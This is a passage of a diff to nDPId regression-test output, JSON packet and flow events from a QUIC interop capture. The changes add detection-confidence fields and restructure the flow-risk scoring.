J\/J3E7ReivOwkmjMio6pMVZIlFMAmLX7M2ggGLe5cHg=="}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1603816434680,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"ts_msec":1603816434680,"pkt":"PKn0qB\/spJGxgjQ5ht1gAQBvAB8RNSABC8hHpBwlAAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9EVLAdgAfFkT+AAAAAAAIs6FDVD5jbx4KGio6\/wAAHQ=="}
 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434680,"flow_last_seen":1603816434680,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434680,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1603816434680,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434680,"pkt":"PKn0qB\/spJGxgjQ5ht1gCSIhBNg6MiABGfAABQwhVAAB\/\/4zO5YgAQsHCsnVrqTT\/kdpHoB9AQQtsQAAAABgAlC2BNgRMiABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWmsgBuwTYjDrICgoKCgjzgkejWnQFTwAARL7AEcGzrGiFbLDVVitPMjpX6T6us8klH0LZdsk33gK4kca790hWc9lEqiHw2zuG3cvmTx4edwCefhx9uVFQHbwCX7OdVaAKALQsTDf2esUnZnHqAVwqfHs0alGH87lg8LOQYMLCyJ5o4796Hi54oLNHvp1iBOlawAP1QQwkOrhTac81Z\/3lqw5txy4fqI2ulRUcc8HMVbAvriqgCRBafLPQysmCOVqjinACocPdi0ZP1pUx0qn0+kKcTF+7gFuANdSw5ZrXDF5v6YKUxiJ6vSw8Hy7vrpHpUiN+5fprlESKduOvuve2w8S0Rn1T\/QCLnqgsvW4zVX2obPqKMBoLM0FaRFm0tupv3jD2Bo6wMhEP7UVS6LQVCbX\/F5hZ42FQPL174ha0Yjp7fot\/ow92n0s8sDYpXdyVzzUtmI9H59mtClZBkXIm4hCy5YwKUBE5Htf0HL6v7tX\/C56I4bHgjD1kXDqKwEusnGxfxLkbm5cB84\/UPVfX54l5AlcUWrKt\/sWPHXza3lrXmjl3iKLayJGvSvxgwAyLdj+1dAf2mHjT3T9ZeLg4TPyNz17SLyKDROZpbuZtC2zCbnl+NoReuXxIIu553FeA7K1Fq06E+HYHhMw9+fWseAQfiQhoIBqlHGL+6zzFwJx8LqsX2kF9IlqJJkfGxh2dCK8J4o5uVhtnU3J2xj0GDXLtBrNSCk7DDd67hChkNkJ\/zra77RGExcKdo9KUDUUYykOLFAbdNAsP9djZJfE2+FIW26Q0ve6PvxjGma3cI1DAbfodw3x7gmpMenGXbAesto3GigfY8Dqk5DyVN2us4Q8jxijjrwa1uGb6WCWFIbPGsRxa2EtoUIAHsP\/pagnvZR1tK2myhxOFZczPeNlpxk1o3SOIXdZrMfCNqe8UgV89dZHklMi3hgQCyoO5n2p9n2UNtckDsulzdkWAkN7ELjfKSw3xLKX8QYYwRNZkrnslYV\/gNUyPn\/DAHxcrYsCggnVPpcMfjQHnjiySyU7agWUfxfnrK5KR0Hz1uxcerQD9r2dHrU5GwRgAJqiERgTrm61j0\/9g6EnJzaJxnY2YL\/8StPHOT4TbswEzgPxmOMhq3B3NyVJmRRvGKyoWosF33+eeRJZtqDmGzt7Y\/QslvmPGsoNyGhIfWD4qHCWm8JN2zWi8NKuiyFpgsC\/gseqp2COjYeHLzTsHE8Lb24ziOBbxiS8nhlUeyvkTXTnPgtpZev\/ducm+wW0A+YY2gp+9vovT+lMYKPoIIeW89qmvsTK34QrhAHBV8Gdi7IG6oE67NdkIrFleG4EtBQyuNTVG\/Hni6IlsFEhmcMOi9gtqRQF0bots7U2r2su6TX5cs\/tWsUtfcKDq01p1Oi+UeZRz\/V+lKX5GfCRE\/JIN8wqGMoYFzwTiwgXQFJuV\/tc8U4uoRYgnau5MAB9+BYOU44CnqwsIla5AaVfMisOMnVZhANbfOkDwWOMuBcFcvM4iPJEdLrpJXtiL7lozz\/DNjHrb6qIdiWBMUyCod\/1w5XY81jvBVw6EPdS52X\/61VYwnM6etnlrj2efLA=="}
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434680,"flow_last_seen":1603816434680,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434680,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434680,"flow_last_seen":1603816434680,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434680,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1603816434682,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1603816434682,"pkt":"PKn0qB\/spJGxgjQ5ht1gCzKCACMROyYGRwAAEAAAAAAAAGgWCCYgAQsHCsnVrqTT\/kdpHoB9Abu1EQAj2NGpAAAAAAAI+gzxyVlrPLD\/AAAd\/wAAHP8AABs="}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434684,"flow_last_seen":1603816434684,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434684,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1603816434684,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434684,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAiNhAAEARQ6HAqAGAyu7cXIm\/EVIE7DIpzgoKCgoIV4qr8UTBK3QAAETSh\/17BQebdhKt5N8exOyNj+uiOYMPWvj6jDz\/XRUXpazLTuGIaL+gAsTmd0\/ny+0FgJZmR3W9tTl2uiHStd0rHjDhZZpjA+Vv70KyXaIxYALOy77NR4C4EhjQ7Woy4Z1XktOMuzY1G1wK+\/m8WHSuXiS0ZJH0FyTMGjp1ybnyu6MTC\/32FsQ4+KBXvfT1hZaE3FEFqOfGH728c4f7jwV39sXMvsF\/koxt7XF+OaEoT44gruD3j1M3Pn+2KBK+MAfr0VIJTB\/qx0CUwI+AOjfOrOEwPlBTKV\/RpKd6AM0mgPkKYfiJQlRit614p6k0X9lbx\/f6ahWLCq72n2YzUVWYWdT5J7gjttfn3tAoB7zUzS53IQUv1B2zhYj8uYWCPv5E8X1+\/TvDaDXt2s1yt3mYps645wMsjGX9jfYnekRT\/suzL4Jvq5T+oMyQFpalloUrRQHYgV03PgJRooTK2iTJSDezMo3Sabn4X3VQSLr6CnIqGTTH4TZdTS1EPTMj1g2xj\/dIUvvG\/pFUdjLNu0inX1PgBZ1cWwdYMDOvaetqYINrUUAYfMt0S6ZnZpx8OdfUPc+mujDPZthVujZlugXTs5\/Mi1arhb7RDdu56QF0HkACvwfN4y6hPV9GkFI7UUzwkjbNgS+SVTyZpwJf1vfOY3NxgRH+ySFpHqqy7QQrR1g1b3fzph2N6Zo2yzEoxr3cQcaq6oirf5SKGC3qVOfI2XVtorskDTjDPZugOVkY\/anHMfrVansEFGxUEN\/DC\/sCrdnQCX2T0SNbs6Z3vWghQ\/Ttglq6nwriBypoi1GkgpMWRpNQC1+tftj6Y6qDc8PUt47spNcYJ0VauEV18MYpeZpOQrwmNsvWkYDeiXS3LX6E8xtGwpF4W5EfDLclRZBbPNPUZexMZprIpblVxLNvXkp38hv3mKP9juEW+w1x9u0\/FE+PXNXqQt+cpccucng\/siXW8dIomIy+1Vr2PrUvdyaaKk0C6UQxd5P55nB9LiOhbpyhKVQTsv\/+44XghuC1pJ3FXt2NjQe+CUcHyg\/CStdVZ77sBr3jEHJD5WyRhPOE0PHrKjEkwO61egIk2dYxhBIp8OCkst22lv5y0ZwcT34lkkTv5u3Z+PpFSID1U+kLTu+5h8UIdmdChB8Ic1cG4AQYLHLWNXQ2dMqc9hc5mVaWGdqVsXAgEZ8PmUGN1\/+K9d7hwED1E+zAtc4tOBuE\/zS269MNpdYACOTcy9RHUvjlSspQylJjubyYwnj40H3orsiMgpv6tA2AxST8dUKpvzYljGrSAdakZ46qVrbuEBiCGMTCs+\/UNgvM2e6Fe+6gqDCfOY\/zXSUtlduoc3jid15XCt88k2M9Kq40sh6m+8eKjtvlwD7XYwfSnLxwxhEyeUkGT+13FX++6oG59AfysFjC5iJYSscA+YXyA0hYuJ9OTtOQZg32pXfl5BmrmRqnRAIwBXmzbGgXzEsXtx+lmlWCK421d8ePwyDwI8wnHfI\/90mFIe34gGT+WMlq4ZgFubtwTSjzidVFs7GoczF7Lrr2uW4jA9qjpqY0sj9p\/VVph1PRzTPVNMdHm+sMkD3+hhI82joYjOeoRxcWEO0C7MjWGcq92hfnKcQSy875okSAGULGntKS3GeTR0gVMj+6KA=="}
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434684,"flow_last_seen":1603816434684,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434684,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00992{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434684,"flow_last_seen":1603816434684,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434684,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1603816434685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434685,"pkt":"pJGxgjQ5PKn0qB\/sht1gD105BNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmgL0RUQTYZ0HNCgoKCggKh53oSKcUIwAARL7gnbCt\/i9esljBwsmPvsojrH1nHZVBY0xSwfKH3XUIijCNgd7Dz8vI4xY\/GVgHV60CIRICp6Kjnr0zMRCxb3nrCucJOyP18UJ2XfpoAWpzvs2pUT\/u95vGBd8XvGhGtYoLqIrMkwYTUuZWsLPdt9\/gzvA15FlJOa7ugVzGXmi7RWK2tRS2hGORcD238yWdl10gYN8ZAvJb8s0UeahNz4nqOB1o1ewm+JfW47bFEqheid7sAMQL3N59\/ISUhkQ8vC1I4dVehQTYmG2zs3sj46oOz5lAFlK26vOv5VRV5IPztRMlciR7V6Adse5xtWtlpuIXzn5\/UDxzj9dah7+yAdZOHeT0zLvwsIoGcoPRxB0MH96VRzKARwz+S7KKOKG8cm2If62RiaOWfmxkaI06NFuh2TWyOGI\/smeYiBlrsSEsSPLBOsy9YKqIRy2SnU5fpV0QIrpOULNF15tvg64kCSUJEHN7hq8wuLHUYVeVMfUb150XuMPRFaeDc+hRLxIgkKsegq\/1GMLnU3cw+YqqtGx9Y3AG3jCsYvczhQt97g+bEAD3lWpSQqlnbIPVaRxSBb\/m++vYk0m7W88TjbXZd39\/H0cIlTvJ\/Z0SYJpuIBWlYvloAhW8wQNQxVyWnDT8EGTCZMIdSLrubgSgxklIcQghvYxGjlenv1U\/xWA4GVcvaRa3KIrmqe9Suq7Jbom9YtFec\/KcUQuypqb9vLHQd\/Slh\/IgOY2LIPbfGrFqtZ5IZSSAFLezKKTHeEUDMMIvjY6nNjfQvhye7w\/iK57ylN1XmmiCsHB2UUISWzLgrbBn+zFoD8q39CqH1PUlQIwDNgZ6s2PfqPEu+x2StileWyY9B4yefqdiNXFJ7u0v6qBj8LUR9\/ZHKs9wt4Es5WiMRZRGcohtyH5Q2qGSEuh57YGdY2plV0kqxOJJg8WuHGwG80hM4Tuuqa2qTyvzRzxBzkkv7jnWbsOt8w6eogTolB5Yq2lNlcox1ozX09J\/4y2Mgjm9fxydUta2PLhNKNF24FGjs9TlXrGvWStOf+FVD0GqXkj4kfvlc5hUlqiu\/hxYQyz7qNm\/6LH0VCx9ePdDf6W4APXGgkkBgu34ndfqUtg0Sa2fWK+OElqxxZw1+Hjyk43LjolIsRbpcWkcSLKwQP4O5jLw4EENRtGoAdziVGhmLWY7AyDGDqDXD+zk0FkOZMfIjeyouDPo8iAsGYm9Ha0mLEq8OysomYrCzakDZNst43uj50cSwd\/VS+ATJsBvZ7N7sRLvBamrC1umCD7i4s16sQmoEu\/PSvNXlSeypCfAg2hJAeLhcz4\/B0WcrTcIC8sTScPAH3uwzv2dtb+6AkA7ey192Tem0ngjhVi9gaWtU5sFQIbMZEgPIufNBRz0zG92jR202hKnv2tVs8fpah1QPJuf+kSUD28xqWVBySjEINK1zyjumcct4vfD2Rv2hsFuDdEnRtRcJ\/VHoB5zsNZ72V1mw1n3OOM3pVkY4\/rmTj\/xZxixYjGJ4hQmi3ZfkZHdBqMDfT25BKOJoR4wohoVf2vU49x7VJnCxuwjZ+PxxTyZPpwTwZZg9+9l1NkFrr1xb3oTJlb1ej2KIFSLLbYLLG40yc\/N4lOiLv0z\/w=="}
 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434685,"flow_last_seen":1603816434685,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434685,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1603816434685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434685,"pkt":"pJGxgjQ5PKn0qB\/sht1gCmkdBNgRQCABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTAB0gARUgTYZd\/PCgoKCgjoF2NeZfCaVwAARL7J5XVlyOrShWgSY1170HREhMEudzqX7b4Uhkojh\/MAMJlRFRdXrnf0lcWEClMJfDhoWlt0RFozrof+Pnw6B4\/ZyoD0RVgGp53poT7G9iC\/absqyVIsEHLsIVC5iZKsIfFtdWkKkdpnRNCGnT3VGY+lFXxBZPJt0vOu0Y2zKMRZ1lC610Klnd+ZJcx\/qSoPqRUIsoETASUmzbWQ7TdG1oxWQGH3wcVc\/v0ICxVUtoMYgJeXx8betPxfyREuBm4E4FoTyJhXcui3XIN3o0Due9ptbZ7SBfuGpb8TN46lwteVUqUUJ5Xe9lf39a3FP9dO2Xqnjw\/WZZomS7Iw1nD9mfjLCEsYGSPz8KBf1FK8U9BWWKadaREsfFGSsUnk3AD67edvUllQXvSDtlbzAUvFF3HIenC2Cy9ysj2h2ptZLfbFln02ZGCulECgFzFtpNDys561LCsH00nvAhS+\/pbJhKpkIQwt944Www\/ODMtfhA6WoAEpgpG06f42PQF9unibmel+Q1UkCV\/Sju8NlC7DCa5v5QN61TvjaWLK+67RDNsHdrusmUnxS0Qw6MgCr1XJXgSd8aQkDA+Nthb+EBlxmaEXwuybb2XuVgqC4V6G6xFD3Gim1RJcrCQKLBGVfueSLYvhKVwT8SeP4SR+OZfWoWq9fjTaViFhYYCsic+3myY3YSADfawnGFA+SyhJdTjrJj9L1vETLMfU6LQ4fjJs\/8YN6WcxBXdSBCin3bSBe2urzqaduq+kb17UjxDbg4QJxXnAa7r5qUQIYXTqC81D8LDrVnVZEVBGUFKebfrcgAxOMID2c3r9c9lUOsj+C6sMlckNXJelOsGIB83E1w9dml1EmevOJyz+MzHSmFAJVMeyfthe7Acpa\/6iTFxUC2VqHJlZjwCn4\/6wRzHC9TG9Zo5VPWRd+g6TJGNweOX8P\/9ZlB9RFiPwzvHlNFT6b3Mb3QxWLg6Ttmg0E+ML1rtxKM7\/yRgs5vxr\/diUa1PzRXjEZ+f5zpp2kE91jKJH4+73tgEQMYk7Eyd89yRmygltVrH\/fU3Ue7GrFhffvVmLvE35MSx0aH6IGdc\/U1oMjWOy0EoTkWjTh0p859\/pRscc2n0uSgJ0X+9D\/EbzkVIZ39Oi5k4wHfsZGD8WTv3IQhB4KGqrNsOYfHpEFOYsQdn9gLcQXwn4iTTbKaZ9rDik21mQSKdUJWkKqJOll6AYoarRO+2QwNgtxGGc9KoDCliYHauCpZ+lGYjtpy5eB2tibMJTLE0Gnrzi6TXFgGqp4wUvIqEqIQ7kO3WFekwujCNCYafCZWYtZ66P1CWPtvc+cRSrUO6Bx299H6EewArx3M8oD1TU7RZVYNta1PmN9bWQg7109Ib8Pk3crjfxcU0dAj+led14LXpRrlgp\/QeJZZuc3wsMwiTDPy3TJcx5+ZXKykG0+Rze8up6KNJ0TOkliR5SFYCrvJk8ixSq\/yqeCqIEYozf9Q0bKCLl8\/Buyu+IUOQ+uNeuzWzi4apJbhNBlCaMuCrdvdjkQpiOWPf9EVqBWcYwBbWS1gM7Y0WFCSCyXc2PxB78fF4bL4IfjxhdAkZdz0MrFIiD9A7sCWzJyDkoQoFSPdTAM2SY\/PtnrUK9nA=="}
-00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434685,"flow_last_seen":1603816434685,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434685,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434685,"flow_last_seen":1603816434685,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434685,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 01183{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1603816434686,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"ts_msec":1603816434686,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA9+cAAC0BNK0znmliwKgBgAMKTnsAAAAARQAFAF2XQAAwEYktwKgBgDOeaWKwwhFRBOz8KMwKCgoKCP1n32NN8EnlAABE0jB6HybCFUbabkBlXXQVvewn7zDYehbLSZDjKVLf8snzKJdjR\/3JsPdO+vxlafCYsOkUTueZwJWg10Sg8fn0URQdzFi5gf\/QXZQO6ykhfm8a5Zr2+yBt68dnry5zhANveVge4e8snv2G\/EjNXJKG6Jyq2Wd1UiHDsng78dU6PMilPEvqoDuVAeleo92UeM\/LYmvYaEQWibrlo50VzyM0Qv2OE8uBtE0321S2ppuHo\/ubVRja900u6Tdl87fZa+TqILwJoqVX3KxUJszQP\/m4sTr7SSAg4d30fbCCPgGuhd5vecogxfB3YV8fE8VleuNDGZEznGuTG3MEvmD8\/iDQCIxdLNqMLq4OHJR5K0P4db2PcHy\/HGrvnaBUxSsUFpFbt7dov\/pgLFhL9QjjASYLcFmP9aDGJ4WvT1nHm+247V70NABa4wQtolKRPLihtpaTI978PvhAx7OA\/FDrMALGCkkd0Ckzcuf5\/RdiusGznuJWz6dbRFAvYuAY6z+uTeSY3eMIQi5VhMcXXLlIqpnkVl9ay3z8cpya5MO76mkRAtNLAnc4uy4dq4IdWYKxFDEs514DLZLoll455nZesjVL6SKL9qMReSCKhO\/op5kVDv+GxSpbs9KycUr8HjhlDhtOqnPPf31XxGL0FX0honv9o2mTwKGu95c="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1603816434688,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1603816434688,"pkt":"PKn0qB\/spJGxgjQ5ht1gAY5iACMRNCABGfAABAA0AAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9EVGLOwAj7QnAAAAAAAAINUX0m0oVmLXKOtq6\/wAAHf8AABs="}
 02140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1603816434693,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434693,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApABAAEAR2hTAqAGAA3nyNu1wEVEE7JhqzAoKCgoI7mu7hqnhXwQAAETShPHzPPAkQK2NEhJGnleHaiN0ie5qTdnm464jrXCgs4dpEiXNx\/PGBx7TOLjXnxLSumidbRKwVj0cRR128B6iHNMflXwQht2t8Y44LmwMqcGdFgLa+9ZMaGseDnBaSdSq\/BTPBASRNPP5ViOFASdiCzWBBZ9WWzIm4Zq1cmr1m+3KYiXPZ4DYcjOiBC+RnrFuinz0kYMk86K9x6ewtyvVVkz06rH\/0pP52NDoXW\/b\/MQkNjC8KUi9qGQJPKOuv\/DmccHaQsbHCmJiyo\/0QNZTrabAtHI7akrTZimPvxnGDDh3iKeWTI0Rt9dVSQExok8KND6xq3GcpnEKSLoNMV4xJO\/u8Hd3ib0ZTAW90kp9rc7u7p5ChlZkz1hOn6CQxtLF+4Q0C+LoqzxjzQ7yi2OlbBMZIKyzLtWw7xW299MwVnAiFEtj5S1RjtdQdmj6SAPB0h4vvOCMTAjBLrzNUIzUQQ4418YwmRANW+EzePT6mR1Ale6pegThd1LeXLddvoztOKGJo5TEa5MgYMehxhTg2TXP6YXaavnooLGg557tbafcTn3wzp5jbVUwxY9sKGj16QzN8+Fynpug9j5\/9WGOFqWFzcYqmUsX0\/xG2xH8WvkKARD0l\/sk42N9NbTB7Ss95x\/zpvrC7DRs8wzKYSZy+NZzyMWwe4xcTPC8pdC3jzhcEXdF2RnCaPHIghUD9RT4W1CfQ1kNWOulxGvcIr6FHiUeq9MpQR4aV5XkRR5Ltsm0vYQyB2x6O6vPlGQo9UKOc2XAIsuJ\/UbYOmk2NYvlK5HnPtbkhJY\/IiZ7z23icAn3thnf9kKY5ERwFbNb\/un4e9T0EmsPw2t0OaIH16APDL4fOPl6+1VOOMCOqaajX6JJ\/\/VzPWdr3Gs+W1hKm0IJjwEBhbsb4P0Y6VCEvVHsNI7mTVZMkEAua9fwXy2V4utejHZLSRSgMPQJSvLG25D\/bKthcwd1lVPwIPmwpCJB1fyQWm6AhqFghO9Zupebv0zgTmzy1tLUnzVFLEzE4ypNxUpFeb7gzSfiS6a7+MCybpQYls379X4F53iU+GTINzG20LYm+XcA+4YEJemBM6vBH5vOwhicXfh\/S4xBSLLLmN+mSkM6sSSr11u3IsDj4PDyBLrk0cKt+Xez\/nYA53eqNQH8wobiK\/1UcQl+9e0C3Q5AQcsBs2MRhY6nnaLEFqMO55ANIVeq58cAWZ8Kve4BjvDSY3uaBdKWaqONn49IjBfiSMz4x\/Xbh8S6vECtoIhrWF90MTfHWh3iWZB5qXTSIFhe9owOmMU\/Usk6Uy8KzZy7KTlRZYfDqKbq7rcX5VnkanJDx7H6mBh